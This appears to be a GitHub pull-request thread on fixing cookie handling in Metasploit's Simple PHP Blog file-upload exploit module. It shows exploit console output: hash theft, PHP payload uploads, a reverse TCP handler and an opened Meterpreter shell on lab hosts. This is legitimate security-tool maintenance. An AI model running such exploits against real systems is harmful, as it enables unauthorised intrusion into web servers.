"PHPSESSID=kgks1uicqn4n74kba3an676fd3;"
[-] Error retrieving cookie!
[+] Successfully Uploaded zGZZdjHW6BgsWClwBHnu.php
[+] Successfully Uploaded gaj9hSsTlUrN0fDrxpiq.php
[+] Successfully reset original password hash.
[+] Successfully removed /images/zGZZdjHW6BgsWClwBHnu.php
[*] Calling payload: /images/gaj9hSsTlUrN0fDrxpiq.php
[+] Successfully removed /images/gaj9hSsTlUrN0fDrxpiq.php
[*] Exploit completed, but no session was created.

@bcoles
Copy link
Contributor

bcoles commented Nov 30, 2020

Here you go:

msf6 exploit(unix/webapp/sphpblog_file_upload) > exploit

[*] Started reverse TCP handler on 10.10.10.250:4444 
[+] Successfully retrieved hash: $1$qmJBhAiQ$svVcAJqX0gNhlX.iCpY4o0
[+] Successfully removed /config/password.txt
[+] Successfully created temporary account.
[+] Successfully logged in as CCBBiy:GXGLyD
"PHPSESSID=kgks1uicqn4n74kba3an676fd3;"
[-] Error retrieving cookie!
[+] Successfully Uploaded zGZZdjHW6BgsWClwBHnu.php
[+] Successfully Uploaded gaj9hSsTlUrN0fDrxpiq.php
[+] Successfully reset original password hash.
[+] Successfully removed /images/zGZZdjHW6BgsWClwBHnu.php
[*] Calling payload: /images/gaj9hSsTlUrN0fDrxpiq.php
[+] Successfully removed /images/gaj9hSsTlUrN0fDrxpiq.php
[*] Exploit completed, but no session was created.

Thanks. So it looks like PHPSESSID and my_id are identical, and get_cookies can successfully retrieve PHPSESSID.

It would probably make more sense to rework the cookie parsing logic in this module to use PHPSESSID.

Does something like this work for you?

if res.get_cookies =~ /PHPSESSID=(.+);/

If so, that seems like the best fix. I'm going to assume that the server always issues both a PHPSESSID and my_id cookie.

Thanks for taking the time to report and fix this. It looks like it was broken in 8d4d40b and never tested.

Ideally this module should be rewritten and tested. But I have neither the time nor the interest.

@justinopatrny
Copy link
Contributor Author

Works for me - successful when new code applied.

msf6 exploit(unix/webapp/sphpblog_file_upload) > exploit

[*] Started reverse TCP handler on 10.10.10.250:4444 
[+] Successfully retrieved hash: $1$gzszdvUY$a9drusIlFhoFOwPnJdOxm0
[+] Successfully removed /config/password.txt
[+] Successfully created temporary account.
[+] Successfully logged in as rkTjHM:nufDWI
[+] Successfully retrieved cookie: gq8hmdnpb09tht26dacrfp96f7
[+] Successfully Uploaded O02kypIovyInIArpbnDe.php
[+] Successfully Uploaded jldytwOV9Pv4Qs7O5LDv.php
[+] Successfully reset original password hash.
[+] Successfully removed /images/O02kypIovyInIArpbnDe.php
[*] Calling payload: /images/jldytwOV9Pv4Qs7O5LDv.php
[*] Sending stage (39282 bytes) to 10.10.10.100
[*] Meterpreter session 1 opened (10.10.10.250:4444 -> 10.10.10.100:38551) at 2020-11-29 22:02:29 -0600
[+] Successfully removed /images/jldytwOV9Pv4Qs7O5LDv.php

@bcoles bcoles added the bug label Dec 2, 2020
@smcintyre-r7 smcintyre-r7 self-assigned this Dec 2, 2020
@smcintyre-r7
Copy link
Contributor

Confirimed switching it to PHPSESSID worked for me as well so I pushed that change up in a322647. Once the unit tests pass I'll go ahead and land this.

msf6 exploit(unix/webapp/sphpblog_file_upload) > rexploit
[*] Reloading module...

[*] Started reverse TCP handler on 10.10.10.128:4444 
[+] Successfully retrieved hash: $1$pEc2Ps7f$x5G9uLsdOCcV5UPhhdj7K1
[+] Successfully removed /config/password.txt
[+] Successfully created temporary account.
[+] Successfully logged in as 8f0VZw:vJI3ni
[+] Successfully retrieved cookie: o0c53uv0pq8prbjr2s2f4e2aq6
[+] Successfully uploaded DGQ9zJPZ4JBxY4AiDMMX.php
[+] Successfully uploaded it2rNwY1lEVDq0p5vmzW.php
[+] Successfully reset original password hash.
[+] Successfully removed /images/DGQ9zJPZ4JBxY4AiDMMX.php
[*] Calling payload: /images/it2rNwY1lEVDq0p5vmzW.php
[*] Sending stage (39282 bytes) to 10.10.10.100
[*] Meterpreter session 2 opened (10.10.10.128:4444 -> 10.10.10.100:41445) at 2020-12-02 10:06:56 -0500

id
[+] Successfully removed /images/it2rNwY1lEVDq0p5vmzW.php

meterpreter > 
meterpreter > id
[-] Unknown command: id.
meterpreter > getuid
Server username: www-data (33)
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 10.10.10.100 - Meterpreter session 2 closed.  Reason: User exit

@smcintyre-r7
Copy link
Contributor

For the record, I went back through the SVN history on SourceForge and noticed that the oldest revision is v0.5.0 according to docs/CHANGELOG.TXT. I found no references to my_id in the code, but did notice that it appears to be using the standard PHP session mechanism. It may have changed between 0.4.0 and 0.5.0, but I'm not sure where the original use of my_id came from. My guess is they were migrating to the PHP standard mechanism at that time.

@smcintyre-r7 smcintyre-r7 merged commit 2b48c42 into rapid7:master Dec 3, 2020
@smcintyre-r7
Copy link
Contributor

smcintyre-r7 commented Dec 3, 2020
edited by pbarry-r7
Loading

Release Notes

Fixed the exploits/unix/webapp/sphpblog_file_upload (Simple PHP Blog) exploit to use the correct session cookie value.

@smcintyre-r7 smcintyre-r7 linked an issue Dec 3, 2020 that may be closed by this pull request
Cookie retrieval issue in sphp exploit #14441
Closed
@smcintyre-r7 smcintyre-r7 mentioned this pull request Dec 3, 2020
Closed
@pbarry-r7 pbarry-r7 added the rn-fix release notes fix label Dec 9, 2020
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@smcintyre-r7 smcintyre-r7

Labels
bug rn-fix release notes fix
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

Cookie retrieval issue in sphp exploit
4 participants
@justinopatrny @bcoles @smcintyre-r7 @pbarry-r7